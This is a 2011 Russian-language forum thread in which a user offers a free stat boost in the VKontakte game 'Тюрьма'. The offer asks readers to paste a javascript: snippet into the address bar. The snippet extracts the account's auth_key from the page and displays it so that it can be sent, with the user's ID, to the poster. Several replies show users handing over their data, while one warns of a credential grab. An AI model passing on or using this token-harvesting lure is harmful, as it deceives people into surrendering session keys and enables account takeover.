|
Бицуха в приложение тюрьма.
|
|
Удаленные
Здравствуйте пользователи МС,я хочу предложить вам свою услугу,бесплатно! Что за услуги?Всё очень просто,я прокачиваю бицуху в приложение тюрьма Что я за это хочу?Да буквально ничего,по желанию отблагодарить,ну и оставить отзыв обо мне На сколько % я делаю?Точно сказать не могу,делаю ~700 Что от вас требуется? Зайти в в контакт,скопировать ID,и выслать мне в ЛС. После,зайти в приложение и прописать данный код,в адресную строку: Code javascript:var link=document.body.innerHTML.match(/(auth_key\":\".*\",\"l)/)[0]; var auth = link.substring(11,43);var answer = prompt ("auth_key by ViLKaa",auth); После того,откроется окошко,вам нужно скопировать код,и выслать мне в ЛС в мести с вашим ID. После я вам высылаю скриншот по желанию. PS: Делаю только от Проверенного и выше. Спасибо за внимание. © fiN |
Пост отредактировал fiN - Среда, 05.01.2011, 22:41 |
|
Заблокированные
Quote (fiN) javascript:var link=document.body.innerHTML.match(/(auth_key\":\".*\",\"l)/)[0]; var auth = link.substring(11,43);var answer = prompt ("auth_key by ViLKaa",auth); а что это за код? |
+1оо5оо Делаю рипы отдельных частей сайта - платно Писать в ЛС ------------------------------ Видали как у меня BMW по трассе идёт? :D |
|
Удаленные
| pavlenko123, После этого кода выйдет окошко с ключём,который мне нужен для работы программы. |
|
Проверенный
| не совеутю...думаю вылизет окно с кодом, в котором будет ваш Емейл и пароль! |
|
Заблокированные
|
Удаленные
Шприц, По отзывам увидем Мне аккаунтом жертвовать ради аккаунта в контакте?бред. -axeL-, Желательно ID цифрами,и впишите скрипт. |
|
Проверенный
|
Удаленные
| kalabok, Вижу,буквально через 10 минут начну.Закончу 1 поднимать. Добавлено (05.01.2011, 23:05) --------------------------------------------- kalabok, Начал,в данный момент бицуха ровна 7 |
|
Удаленные
Можете полностью доверится данному ТС. Сам подумал что это какой то "Hacked code", но так как мы с ним делаем один сайт - Я доверился. В итоге из 400 бицухи у меня теперь ~ 1 200 бицухи. fiN, спасибо. |
|
Удаленные
| Аffect, Спасибо за отзыв. |
|
Заблокированные
| fiN, Отправил данные в лс. Как будет всё сделано пиши в лс |
|
Удаленные
|
Проверенный
Бицуха поднялась!(не знаю на сколько но сейчас есть)  |
|
Удаленные
| kalabok, Поднялась на ~500 единиц,ещё пока не окончилось.Продолжаю.Скрин будет в ЛС. |
|
Проверенный
Отправил все в лс Если можно скрин в ЛС |
Пост отредактировал trane93 - Среда, 05.01.2011, 23:24 |
Продаю прогнозы(не дорого) писать в ICQ 574987721 |
|